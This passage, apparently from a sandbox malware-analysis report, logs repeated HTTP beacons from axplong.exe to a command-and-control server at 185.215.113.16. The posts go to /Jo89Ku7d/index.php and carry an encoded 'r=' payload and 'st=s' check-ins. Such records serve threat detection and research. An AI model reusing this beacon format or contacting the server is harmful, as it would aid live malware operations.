Jul 26, 2024 21:00:01.146190882 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 21:00:01.407320023 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.6	51131	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:01.525332928 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:00:03.069415092 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:00:03.070761919 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:00:03.070935011 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:00:03.096155882 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 21:00:03.342699051 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.6	51132	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:03.464626074 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:00:04.385667086 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.6	51133	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:04.395015001 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 21:00:05.173918962 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.6	51134	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:05.294424057 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:00:06.057610035 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.6	51135	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:06.066302061 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 21:00:06.812999010 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.6	51136	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:06.933584929 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:00:07.711100101 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.6	51137	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:07.721373081 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 21:00:08.493729115 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.6	51138	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:08.619985104 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:00:09.392926931 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:00:09.397387981 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 21:00:09.688348055 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.6	51139	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:09.818468094 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:00:10.609327078 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.6	51140	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:10.618573904 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 21:00:11.387840986 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.6	51141	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:11.514400959 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:00:12.267776966 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.6	51142	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:12.277200937 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 21:00:13.047894001 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.6	51143	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:13.165870905 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:00:13.931571007 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.6	51144	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:13.947204113 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 21:00:14.728379965 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.6	51145	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:14.857645988 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:00:15.612291098 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.6	51146	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:15.621970892 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 21:00:16.372337103 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.6	51147	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:16.510842085 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:00:17.266690016 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.6	51148	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:17.276571035 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 21:00:18.052725077 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.6	51149	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:18.363507986 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:00:19.160573959 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.6	51150	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
